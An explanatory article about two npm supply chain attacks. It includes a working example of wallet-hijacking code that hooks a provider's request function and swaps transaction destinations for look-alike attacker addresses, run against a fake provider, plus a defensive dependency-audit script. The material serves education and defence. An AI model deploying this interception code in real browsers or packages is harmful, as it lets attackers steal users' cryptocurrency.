Flamingo Finance has confirmed that it was not affected by either of the two recent npm supply chain compromises. The first targeted cryptocurrency users by injecting wallet-hijacking code into 18 widely used JavaScript packages.
A few days later, a second campaign compromised more than 40 packages with a self-replicating worm.
What is a supply chain attack?
A supply chain attack introduces malicious code into a software component that other software depends on. Open source libraries are reused in countless projects, so a single compromised package propagates across the whole ecosystem.
Modern development practices amplify the risk. Applications routinely depend on hundreds of small libraries, many maintained by one or two people. AI-assisted coding pulls in still more packages automatically, so the number of dependencies, and with it the attack surface, keeps growing.
How Malware Works
In the crypto-focused incident, the attacker took over a single maintainer's npm account and used its publishing rights to push malicious versions of the packages. The compromise was spotted by the security companies Aikido and Socket. Between them, the affected packages account for billions of downloads per week, so the potential reach was enormous.
The first malware was a browser-side interceptor. It hooked core functions such as fetch, XMLHttpRequest and the wallet API and scanned them for EVM transfer requests. When a transaction was detected, the destination address was quietly replaced with one the attacker controls, choosing a look-alike address (the closest match to the original) so the swap would not arouse suspicion.
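As an added illustration (not code from the incident or from Flamingo Finance), the block below shows the two pieces of that trick in Node: a wrapper around a provider's `request` function that rewrites the `to` field of `eth_sendTransaction` calls, and a look-alike selector that picks the attacker address with the smallest edit distance to the original. The provider is a constructed stand-in for `window.ethereum`, and every address is a made-up placeholder. A small defender-side check compares what the dApp asked for with what actually reached the wallet.

```javascript
// Added example: browser-side "clipper" pattern and a look-alike address
// selector. Node 18+, no network. The provider object is a constructed stand-in
// for window.ethereum; all addresses below are placeholders, not real accounts.

// Constructed attacker-controlled pool (placeholders). The first entry shares
// the first 10 and last 8 characters of USER_DEST, which is what makes a
// glance at the wallet prompt insufficient.
const ATTACKER_POOL = [
  "0x00a1b2c3d4e5f6071829feedfacecafe90a1b2c3",
  "0x9999999999999999999999999999999999999999",
  "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef",
];
const USER_DEST = "0x00a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3";

// Standard Levenshtein distance with a single rolling row.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0]; // D[i-1][j-1]
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j]; // D[i-1][j]
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Pick the attacker address that looks most like the victim's destination.
function closestLookalike(target, pool = ATTACKER_POOL) {
  const t = target.toLowerCase();
  let best = pool[0];
  let bestDist = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(t, candidate.toLowerCase());
    if (d < bestDist) { best = candidate; bestDist = d; }
  }
  return best;
}

// The interception itself: every call still goes through to the real
// provider, but eth_sendTransaction has its destination silently swapped.
function installClipper(provider) {
  const original = provider.request.bind(provider);
  provider.request = function (args) {
    if (args && args.method === "eth_sendTransaction" && Array.isArray(args.params)) {
      const tx = { ...args.params[0] };
      if (typeof tx.to === "string") tx.to = closestLookalike(tx.to);
      return original({ ...args, params: [tx, ...args.params.slice(1)] });
    }
    return original(args);
  };
  return provider;
}

// Constructed stand-in for window.ethereum: synchronous for simplicity and
// records every transaction it is asked to send.
function makeFakeProvider() {
  const provider = {
    sent: [],
    request(args) {
      if (args.method === "eth_sendTransaction") {
        provider.sent.push(args.params[0]);
        return "0x" + "ab".repeat(32); // fake transaction hash
      }
      if (args.method === "eth_chainId") return "0x1";
      throw new Error("unsupported method " + args.method);
    },
  };
  return provider;
}

// Defender-side check: compare the dApp's intended destination with what the
// wallet actually received. In a real browser the wallet's confirmation dialog
// is where this comparison happens, and the full address must be read.
function sendAndVerify(provider, tx) {
  provider.request({ method: "eth_sendTransaction", params: [tx] });
  const actual = provider.sent[provider.sent.length - 1];
  return {
    intended: tx.to,
    actual: actual.to,
    tampered: actual.to.toLowerCase() !== tx.to.toLowerCase(),
  };
}

console.log("clean provider:", sendAndVerify(makeFakeProvider(), { to: USER_DEST, value: "0x1" }));
console.log("hooked provider:", sendAndVerify(installClipper(makeFakeProvider()), { to: USER_DEST, value: "0x1" }));
```

The hooked run reports `tampered: true` with an `actual` address whose first ten and last eight characters match the intended one; that is the case a quick visual check misses, so the full address has to be compared.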
The worm discovered a few days later had a different goal. It harvested npm tokens, SSH keys and other credentials from developer environments and used the stolen npm tokens to republish itself into every other package those tokens could reach. Although it did not target cryptocurrencies directly, it showed how quickly a single breach can cascade through the registry.
Impact on cryptocurrency users
The attacker's initial focus was Ethereum-compatible wallets such as MetaMask. Despite the reach of the compromised packages, on-chain monitoring traced less than USD 500 to the attacker's addresses.
Experts credited the rapid detection and response with limiting the damage.
Flamingo Finance said its decentralized exchange is not affected because it does not rely on direct EVM transfer flows; it uses EVM only for cross-chain operations, which the malware did not attempt to exploit.
Structural risks
Both incidents expose the same weakness in the open source supply chain. A single stolen credential can push malicious code into packages downloaded billions of times a week, and many of those packages are maintained by individuals or very small teams with little capacity to withstand a targeted attack.
Researchers are calling for stronger protections, including mandatory hardware security keys for maintainers, tighter publishing permissions, and cryptographic provenance for new releases. Without such changes, phishing and credential theft will remain reliable entry points for attackers.
Stay safe
Developer defenses include enforcing hardware-backed authentication, limiting publishing privileges, rotating credentials, pinning dependency versions, and scanning builds for anomalies.
Adopting provenance attestation in the CI/CD pipeline further reduces exposure.
End users can reduce risk by delaying updates until new versions have been reviewed, minimizing the number of apps and extensions connected to their wallet, and keeping large balances in hardware or multi-signature wallets.
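An added example (not from the article or from Flamingo Finance) that turns three of those developer defenses into a CI check: it flags dependency ranges that are not pinned to an exact version, lockfile entries resolved from somewhere other than the expected registry or lacking an integrity hash, and packages that declare install-time lifecycle scripts, which is the hook the worm used to run on developer machines. The package names, versions, hashes and the `audit-deps.js` file name are constructed; the `hasInstallScript` flag is the one npm writes into lockfile v2/v3 entries.

```javascript
// Added example: dependency hygiene check for package.json + package-lock.json.
// Node 18+, no network access. All sample data below is constructed.
// Hypothetical usage: node audit-deps.js

const EXACT_VERSION = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$/;
const ALLOWED_REGISTRY = "https://registry.npmjs.org/";
// Packages allowed to run preinstall/install/postinstall scripts. Install
// scripts are how a trojanized package executes on a developer machine, so
// the default allowlist is empty and every such package is reported.
const INSTALL_SCRIPT_ALLOWLIST = new Set();

// Check 1: every declared dependency must be an exact version, not a range.
function auditManifest(manifest) {
  const findings = [];
  for (const field of ["dependencies", "devDependencies", "optionalDependencies"]) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      if (!EXACT_VERSION.test(spec)) {
        findings.push({ kind: "unpinned-range", name, detail: `${field}: "${spec}" is a range, not an exact version` });
      }
    }
  }
  return findings;
}

// Checks 2 and 3 on the lockfile: registry origin, integrity hash, install scripts.
function auditLockfile(lock, { allowedRegistry = ALLOWED_REGISTRY, installScriptAllowlist = INSTALL_SCRIPT_ALLOWLIST } = {}) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "" || entry.link) continue; // root manifest or workspace symlink
    const idx = path.lastIndexOf("node_modules/");
    const name = idx === -1 ? path : path.slice(idx + "node_modules/".length);
    if (typeof entry.resolved === "string" && !entry.resolved.startsWith(allowedRegistry)) {
      findings.push({ kind: "unexpected-registry", name, detail: entry.resolved });
    }
    if (!entry.integrity) {
      findings.push({ kind: "missing-integrity", name, detail: `no integrity hash for ${entry.version}` });
    }
    if (entry.hasInstallScript && !installScriptAllowlist.has(name)) {
      findings.push({ kind: "install-script", name, detail: `runs install-time scripts (${entry.version})` });
    }
  }
  return findings;
}

function auditDependencies(manifest, lock, options = {}) {
  return [...auditManifest(manifest), ...auditLockfile(lock, options)];
}

// Constructed sample inputs: one clean dependency, one with a range and an
// install script, one dev dependency pulled from an unexpected mirror.
const SAMPLE_MANIFEST = {
  name: "sample-app",
  dependencies: { "example-colorize": "^5.3.0", "example-log": "4.4.1" },
  devDependencies: { "example-bundler": "~2.0.0" },
};
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "sample-app" },
    "node_modules/example-colorize": {
      version: "5.3.1",
      resolved: "https://registry.npmjs.org/example-colorize/-/example-colorize-5.3.1.tgz",
      integrity: "sha512-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
      hasInstallScript: true,
    },
    "node_modules/example-log": {
      version: "4.4.1",
      resolved: "https://registry.npmjs.org/example-log/-/example-log-4.4.1.tgz",
      integrity: "sha512-BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB==",
    },
    "node_modules/example-bundler": {
      version: "2.0.3",
      resolved: "https://mirror.example.net/example-bundler-2.0.3.tgz",
    },
  },
};

const findings = auditDependencies(SAMPLE_MANIFEST, SAMPLE_LOCK);
for (const f of findings) console.log(`[${f.kind}] ${f.name}: ${f.detail}`);
console.log(findings.length === 0 ? "OK" : `${findings.length} finding(s); failing the build`);
```

In a pipeline this would exit non-zero on any finding. It complements, rather than replaces, `npm ci --ignore-scripts` for installs that should never execute package code, and `npm audit signatures` for checking registry signatures and provenance attestations on what was installed.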